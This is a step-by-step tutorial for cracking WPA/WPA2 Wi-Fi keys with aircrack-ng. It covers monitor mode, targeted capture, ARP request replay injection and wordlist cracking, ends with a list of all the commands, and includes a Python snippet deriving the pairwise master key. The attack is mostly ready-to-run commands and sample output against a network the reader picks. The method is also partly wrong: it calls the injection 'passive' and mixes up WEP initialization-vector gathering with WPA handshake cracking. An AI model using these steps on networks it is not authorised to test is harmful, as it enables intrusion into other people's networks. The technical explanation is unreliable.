Aircrack-ng is a network software suite crafted to achieve the following objectives:
Note that this tutorial is not an exhaustive guide; rather, it is intended to build some basic skills for testing your own network's security and to get familiar with the concepts.
The attack outlined below is based on a passive technique (the ARP request replay attack) and focuses on Debian-based distributions, assuming you have a working wireless card with drivers already patched for injection.
Aircrack-ng can be installed on a Debian-based operating system by compiling the source code (for more details you can visit the official website).
Below you can find instructions for installing the basic requirements to build aircrack-ng on Debian-based operating systems.
$ sudo apt install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils
Get the latest copy of aircrack-ng:
$ git clone https://github.com/aircrack-ng/aircrack-ng
$ cd aircrack-ng
To build aircrack-ng, the Autotools build system is used. First, configure the project for building with the appropriate options:
$ autoreconf -i
$ ./configure --with-experimental
Next, compile the project with the make command and use the "install" target from the additional targets listed below to complete the installation:
make check
make integration
make install
make uninstall
The purpose of this step is to ensure that your card supports injection.
Assuming your interface name is "wlan0" (you can retrieve it by typing iwconfig in the terminal), type the following command:
# aireplay-ng --test wlan0
The system responds:
18:10:59 wlan0 channel: 10
18:10:59 Trying broadcast probe requests...
18:10:59 Injection is working!
18:11:00 Found 1 AP
...
This confirms your card can inject packets.
The first thing to do is look for a potential target by putting your wireless card into monitor mode using airmon-ng. However, it is strongly recommended to kill all interfering processes prior to using the aircrack-ng suite.
# airmon-ng check kill
Killing these processes:
PID Name
870 dhclient
1115 wpa_supplicant
Then, it is possible to enable monitor mode, which creates another interface (mon0):
# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9485
(monitor mode enabled for [phy0]wlan0 on [phy0]mon0)
You will notice that "wlan0" has successfully been put into monitor mode.
Then, start airodump-ng to look for networks:
# airodump-ng mon0
Locate the wireless network you want to crack, and note its BSSID and channel from the following output:
CH 10 ][ Elapsed: 36 s][2019-05-15 18:15
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
...
Note that the top part of the output lists information about the APs in range, and the bottom part lists the clients connected to those APs.
Open another console session to capture the initialization vectors generated by the target and save the result to a file:
# airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
where -c 10 is the channel of the wireless network, --bssid 08:00:BF:E6:31:2E is the MAC address of the AP, -w output-file defines the prefix of the output files that will contain the initialization vectors, and mon0 is the interface name.
The system responds:
CH 10 ][ Elapsed: 12 s][2019-05-15 18:16
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
BSSID STATION PWR Lost Packets Probes
08:00:BF:E6:31:2E 00:0F:35:51:AC:22 -21 0 183782
Once the command has run, several files will be generated.
The classic ARP request replay attack is the most effective way to generate new initialization vectors, and it works very reliably. The purpose of this step is to start aireplay-ng in a mode that listens for ARP requests and then reinjects them back to the access point.
Keep your airodump-ng and aireplay-ng sessions running, open another terminal, and run the ARP request replay attack:
# aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 618643 packets (got 304896 ARP requests), sent 194947 packets...
You can check whether the packets are being injected by looking at the airodump-ng screen.
At this point, you should be able to obtain the WPA key from the initialization vectors gathered in the previous steps. To perform this attack you need a wordlist; if the network password is not in the wordlist, you will not crack it. Note that most WPA/WPA2 routers come with strong 12-character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the WPA-length password lists.
Open another console session and type:
# aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap
where -a2 specifies the attack mode for WPA/WPA2-PSK, -w wordlist.txt refers to your own dictionary wordlist, and output*.cap selects all output files with the .cap extension.
This is the output of a successful attack:
Aircrack-ng 1.5.2
[00:00:00] 192/1229 keys tested (520.04 k/s)
Time left: 0 seconds 15.62%
KEY FOUND! [ notsecure ]
Master Key : 42 28 5E 5A 73 33 90 E9 34 CC A6 C3 B1 CE 97 CA
06 10 96 05 CC 13 FC 53 B0 61 5C 19 45 9A CE 63
Transient Key : 86 D0 43 C9 AA 47 F8 03 2F 71 3F 53 D6 65 F3 F3
86 36 52 0F 48 1E 57 4A 10 F8 B6 A0 78 30 22 1E
4E 77 F0 5E 1F FC 73 69 CA 35 5B 54 4D B0 EC 1A
90 FE D0 B9 33 06 60 F9 33 4B CF 30 B4 A8 AE 3A
EAPOL HMAC : 8E 52 1B 51 E8 F2 7E ED 95 F4 CF D2 C6 D0 F0 68
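The "Master Key" in that output is the WPA/WPA2 pairwise master key (PMK) that aircrack-ng must derive from every wordlist candidate together with the SSID before it can check the EAPOL HMAC. The Python example below is added here and is not code from aircrack-ng or from this tutorial: it reproduces that derivation and uses the 520.04 k/s rate and 1229-entry wordlist from the output above to estimate how long a short wordlist and a factory-style random 12-character passphrase would take to exhaust. The 62-symbol alphabet and the use of the SSID and passphrase from the output as sample inputs are assumptions.

```python
import hashlib

# Rate and wordlist size taken from the aircrack-ng output above (520.04 k/s, 1229 keys).
KEYS_PER_SECOND = 520_040.0
WORDLIST_SIZE = 1229
SECONDS_PER_YEAR = 365.25 * 24 * 3600


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the WPA/WPA2-PSK pairwise master key (aircrack-ng's "Master Key").

    IEEE 802.11 defines it as PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32).
    The 4096 iterations are why a CPU tests only hundreds of thousands of keys/s.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def seconds_to_exhaust(candidates: int, keys_per_second: float = KEYS_PER_SECOND) -> float:
    """Worst-case time to try every candidate at the given test rate."""
    return candidates / keys_per_second


def years_to_exhaust(candidates: int, keys_per_second: float = KEYS_PER_SECOND) -> float:
    return seconds_to_exhaust(candidates, keys_per_second) / SECONDS_PER_YEAR


def random_passphrase_keyspace(length: int, alphabet_size: int = 62) -> int:
    """Number of passphrases of a given length over an alphabet.

    The default of 62 (upper + lower + digits) is an assumption standing in for
    the character set of a factory-set random key.
    """
    return alphabet_size ** length


if __name__ == "__main__":
    # Sample inputs (assumption): the SSID from the airodump-ng output and the
    # passphrase from the KEY FOUND line above.
    pmk = wpa_pmk("notsecure", "infosec_router")
    print("PMK for notsecure / infosec_router:", pmk.hex())
    print(f"{WORDLIST_SIZE}-word list exhausted in {seconds_to_exhaust(WORDLIST_SIZE):.4f} s")
    print(f"12-char random key exhausted in "
          f"{years_to_exhaust(random_passphrase_keyspace(12)):.3g} years")
```

The contrast between the two estimates is the practical reason the tutorial recommends leaving a router's random factory passphrase in place: the dictionary step only succeeds when the passphrase is short enough or common enough to appear in a list.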
Below you can find the list of all of the commands needed to crack a WPA/WPA2 network.
# kill all interfering processes prior to using the aircrack-ng suite
airmon-ng check kill
# put your network device into monitor mode
airmon-ng start wlan0
# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0
# start listening for the handshake on a new console session
airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
# start the ARP request replay attack
aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
# run aircrack-ng to obtain the WPA key
aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap
This project is licensed under the MIT License - see the LICENSE file for details.
This tutorial has been made for educational purposes only; I don't promote malicious practices and I will not be responsible for any illegal activities.